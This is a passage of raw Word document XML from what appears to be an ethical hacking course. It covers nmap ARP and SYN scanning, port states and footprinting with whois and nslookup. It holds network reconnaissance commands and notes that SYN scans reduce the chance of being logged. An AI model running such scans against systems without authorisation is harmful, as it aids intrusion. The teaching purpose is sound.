        <w:t xml:space="preserve">If you want to scan only the live hosts, you can issue </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA571CA" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="320B16F2"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6E7BFD1B" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want to only send </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>arp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A9E1AE" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0143A735" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B724B50" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ABFF23E"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Pr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">PR </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED24CC">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00ED24CC">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED24CC">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> TARGET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BCD9A8" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>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Default="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BC27ECF" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Port Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F87D045" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Now that we scanned the live systems, we proceed to the next step which is scanning ports.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484DD7AF" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">As the ip address specifies a device on a network among others, TCP/UDP does the same but to the network service instead. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D582EB6" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>For now, we can classify ports in 2 states:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B04E9A9" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">OPEN port indicates that there is </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2795">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>some</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> service listening on that port.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3684E7D0" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">CLOSED port indicates that there is </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2795">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>no</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> service listening on that port.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BDF44D" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">FILTERED port happens when </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> cannot determine whether the port is open or closed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4951EA5D" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6698DB0F" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="007B1F0B"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T</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B1F0B">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> TARGET</w:t>
      </w:r>
      <w:r w:rsidRPr="007B1F0B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1118B029" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This command for TCP </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>connect</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> scan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2AC2F9" w14:textId="77777777" w:rsidR="004E2155"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3286BF7F" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B1F0B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This command </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">does the same as the previous one. However, it does not complete the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3 way</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> handshake connection. After receiving SYN/ACK, it does not send ACK to establish a </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>connection</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> but it sends RST/ACK and this decreases the chances of being logged</w:t>
      </w:r>
      <w:r w:rsidRPr="007B1F0B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766D3A7C" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w: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57698E99" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>We can use this to check whether the port is OPEN or CLOSED. When the port is OPENED, no response should be returned.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07905EA0" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="007B1F0B" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">When the port is CLOSED, we get an </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC7B4B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ICMP packet of type 3, destination unreachable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488AC7D6" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="007B1F0B" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F2140ED" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="00AE2795" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09C471F5" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="00AE2795" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50547DC6" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5469F07E" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F3BEA43" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3896FA09" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1303021D" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7574DA04" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="00E13E2E" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EDCB03C" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc115782527"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lesson 5.2 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0071361A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Footprinting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0071361A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, Reconnaissance and Social Engineering</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="1361AD1D" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="005E4780" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="253AF7AC" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="005E4780" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">To get closer to anything you need to gather information about the target first. From hacking perspective, there are several ways to get familiar with your target.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623C358F" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005E4780">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Footprinting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADF9201" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>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Default="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13DEF608" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0071361A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B91407C" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This is the larger process for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>footprinting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. It can be defined as a survey to gather information about the target. It is the first step in </w:t>
      </w:r>
      <w:hyperlink r:id="rId58" w:anchor="page-top" w:history="1">
        <w:r w:rsidRPr="005D6581">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://www.unifiedkillchain.com/#page-top</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to gain something against the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E63BC00" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Reconnaissance is divided into two types:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133015A8" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Passive reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BB96B6" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Active reconnaissance</w:t>
      </w:r>
      <w:r w:rsidRPr="00C075DB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5591A54C" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In passive reconnaissance you rely on the public available resources without having to engage with the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7F4500" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="001946D3" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>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Default="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35926D42" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>whois</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">A WHOIS server is a service that provides some information about a domain name. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7648E1" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD6B9A7" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00155E9B">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00155E9B">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>whois</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00155E9B">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> google.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419D144F" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This should return info about registrar, creation date, Name Server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4220EFF8" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04A2CBB3" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nslookup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">this command provides the ip addresses for any domain name. For instance, you only know the domain name about your target, and you want to use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to do more stuff, you could translate the domain name to an ip address using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nslookup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746D33E4" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6CB5EE" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00155E9B">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nslookup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00155E9B">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> google.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118C27EE" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>nslookup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> only offers the main domain, and sometimes you also need to know about the subdomains. Therefore, a service like </w:t>
      </w:r>
      <w:hyperlink r:id="rId59" w:history="1">
        <w:r w:rsidRPr="005D6581">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://dnsdumpster.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> was introduced.</w:t>
      </w:r>
    </w:p>
